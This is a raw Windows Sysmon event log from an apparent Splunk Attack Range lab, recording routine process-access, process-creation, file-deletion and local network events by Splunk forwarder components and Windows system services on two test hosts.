Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F327052988101723E3E00987B25AB32,SHA256=543846A61FDBC40B834C48FBECF4F1F010E6273483AD6C81D47C905E311D8EA4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:02.225{C8EA50B7-13B1-6216-7706-000000003802}69166128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:02.147{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13B2-6216-7806-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:02.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:02.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:02.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:02.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:02.147{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-13B2-6216-7806-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:02.145{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13B2-6216-7806-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:02.144{C8EA50B7-13B2-6216-7806-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:03.520{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D3DDF7D9FD12F6747C2465FF4F25C83,SHA256=751EE44871A01A88E8206F782E49F56737A875EB6B7B418329CFCE33CC0923C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218298Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:03.127{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBD8E82E66C16B9838CABF7938BDC3BF,SHA256=E7A4C1AA759D1ABD536BE68197812462DF1563CCC5E5AB6A0472332203BA90DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:04.554{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F3A11644E6C09F6EC7CC95063ADE067,SHA256=D5FE09AE2ED55CAD725F6CF9C2D7B18CE3A68F5F68A84E86723B629F891A5953,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218299Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:04.283{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=249C5540F0E2FFD00BBC7BD971E71B24,SHA256=B8D7A679F00BB2A1C5EEA74DD7017C9520B9C5A5DE02045F91F168063A353856,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:04.223{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13B4-6216-7906-000000003802}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:04.223{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:04.222{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:04.222{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:04.222{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-13B4-6216-7906-000000003802}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:04.222{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:04.220{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13B4-6216-7906-000000003802}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:04.219{C8EA50B7-13B4-6216-7906-000000003802}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000293913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:01.657{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53842-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:05.555{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFF0A446704F5CFDC4EB825E03A360D7,SHA256=8D99B85DAED6F0174CA3E155CC00AFCB7B3C72821DFD46260898B1523B21050C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218300Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:05.408{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DB23C95C252BD27EE3EE39E94F171FD,SHA256=7690814FA2DD04DE1C51B9435F857958E736CCD2D8B21AB9F997A4084E506EA4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:03.275{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53843-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000293923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:03.275{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53843-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000293926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:06.560{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E79ECADADC05C49436B5D46280B4BB28,SHA256=B697E2834AAE198726485E089A2BBAB8688462A65AA38E629E6E4695AAC46F5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218302Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:06.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66312580099E4D6266059545DE874A4E,SHA256=6AA3EE453D7F3D4AB60072FC61948872B40B5158085373AE433934FFD6D5A3C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218301Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:03.607{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51450-false10.0.1.12-8000- 23542300x8000000000000000218303Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:07.644{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA92468D4C9D6640F54AC07B1479C8DC,SHA256=A65AAB62F0DA848FFF9C6B0C8E5DF41E5F1F7579D095A127DC6904AC5B794AE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:07.577{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8077DF2050CD7D7B8637D21C9172B3A,SHA256=BFE135C25D155C7704DC5A710CD3E6264AD13E7BCE67FAF0526649C6B5533F02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218304Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:08.861{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EFCF666A43F74005CD299C5FE1FDC3B,SHA256=8924A5C57A6AAC930B9BF2A303A918855D9186FE376188EA9BE6A8C9D4F75469,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:08.607{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20F507733E75BEB0C9A1C5C59084A54C,SHA256=17C369BAFD6F2F0E13B281BC5939784769FA6F2A549B937EF7B023CF7EE5B392,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218305Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:09.971{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=760A09C913CBDF42043A94DDFE9ADDFD,SHA256=475E1FE8E08420CB21CE23D39D73EBF3026FBF05DC82574AA6D7E237C1981B1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:09.608{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6B2028BA3F83FE9F4F22AE1D39A9BF8,SHA256=D4898FFD6906718612C6C3972F537AD4A264B6914ECAD4026C6E2A13FE67D666,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:10.936{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6B12048EB1EAA170C77E5C9DAAD986FF,SHA256=161437F13D66DF499C082B55FCD70AAE9B6682EAC09CE832B17DE5E6FA6AA8DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 